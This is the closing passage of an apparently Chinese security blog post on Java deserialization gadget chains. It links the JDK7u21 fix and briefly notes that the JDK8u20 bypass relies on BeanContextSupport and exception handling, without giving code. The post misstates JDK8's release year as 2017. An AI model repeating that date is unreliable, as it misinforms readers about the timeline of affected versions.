<li><a target="_blank" rel="noopener" href="https://github.com/openjdk/jdk7u/commit/b3dd6104b67d2a03b94a4a061f7a473bb0d2dc4e">官方修复操作</a></li>
</ol>
<p><img src="/images/pasted-1.png" alt="upload successful"><br>​    如果不一致，就直接抛出异常，从而结束执行。</p>
<p>​    <code>如果抛出异常被try-catch处理后，特殊情况下是不是会存在被利用的可能性呢？</code></p>
<h3 id="拓展分析"><a href="#拓展分析" class="headerlink" title="拓展分析"></a>拓展分析</h3><ol>
<li><code>jdk的很多版本都是并行开发的，那是不是说有可能这个jdk7u21在其他版本的jdk中也存在呢？</code></li>
</ol>
<p>​    通过对比开发时间，jdk8出来时(2017年)，这个已经被修复了，所以以上就不存在利用了。那是不是jdk&lt;jdk7都存在这个洞呢？也不是，因为是并行开发的，jdk6或者其他版本也是在更新迭代，所以也只有部分jdk6或者其他版本收到影响。</p>
<h2 id="JDK8u20"><a href="#JDK8u20" class="headerlink" title="JDK8u20"></a>JDK8u20</h2><blockquote>
<p>好像和上面留的思路一致，就是利用try-catch机制，处理异常，并继续运行put操作。</p>
</blockquote>
<p><strong>关键点：beancontextsupport</strong></p>
<p>这里就先不做分析了，更多的是涉及序列化处理的操作。再另一篇文章分析。</p>
<h2 id="参考"><a href="#参考" class="headerlink" title="参考"></a>参考</h2><p>java 安全漫谈</p>
<p><a target="_blank" rel="noopener" href="https://tttang.com/archive/1357/#toc_beancontextsupport">jdk8u20反序列化分析</a></p>

    </div>

    
        <hr class="fhr">
        <div id="vcomments"></div>
    
</div>
    <div class="footer" id="footer">
    <p>Copyright © 2020 <a class="flink" href="#">Hexo</a>-<a class="flink" href="#">Geek</a>.
        <label class="el-switch el-switch-green el-switch-sm" style="vertical-align: sub;">
            <input type="checkbox" name="switch" id="update_style">
            <span class="el-switch-style"></span>
        </label>
<!--         <script type="text/javascript">
        var cnzz_protocol = (("https:" == document.location.protocol) ? "https://" : "http://");
        document.write(unescape("%3Cspan id='cnzz_stat_icon_1278548644'%3E%3C/span%3E%3Cscript src='" + cnzz_protocol + "v1.cnzz.com/stat.php%3Fid%3D1278548644%26show%3Dpic1' type='text/javascript'%3E%3C/script%3E"));
        </script> -->
    </p>
</div>
<input type="hidden" id="web_style" value="black">
<input type="hidden" id="valine_appid" value="5w9PmzL7vEvl3ac9ymhLYEkf-gzGzoHsz">
<input type="hidden" id="valine_appKey" value="W4fBw8xWo1fozFjb2XrXB5S6">

<script src="/libs/jquery.min.js"></script>


<script src="/libs/highlight/highlight.pack.js"></script>

<script src='//cdn.jsdelivr.net/npm/valine@1.3.10/dist/Valine.min.js'></script>

<script src="/js/js.js"></script>

<style type="text/css">
.v * {
    color: #698fca;
}

.v .vlist .vcard .vhead .vsys {
    color: #3a3e4a;
}

.v .vlist .vcard .vh .vmeta .vat {
    color: #638fd5;
}

.v .vlist .vcard .vhead .vnick {
    color: #6ba1ff;
}

.v a {
    color: #8696b1;
}

.v .vlist .vcard .vhead .vnick:hover {
    color: #669bfc;
}
</style>

</body>

</html>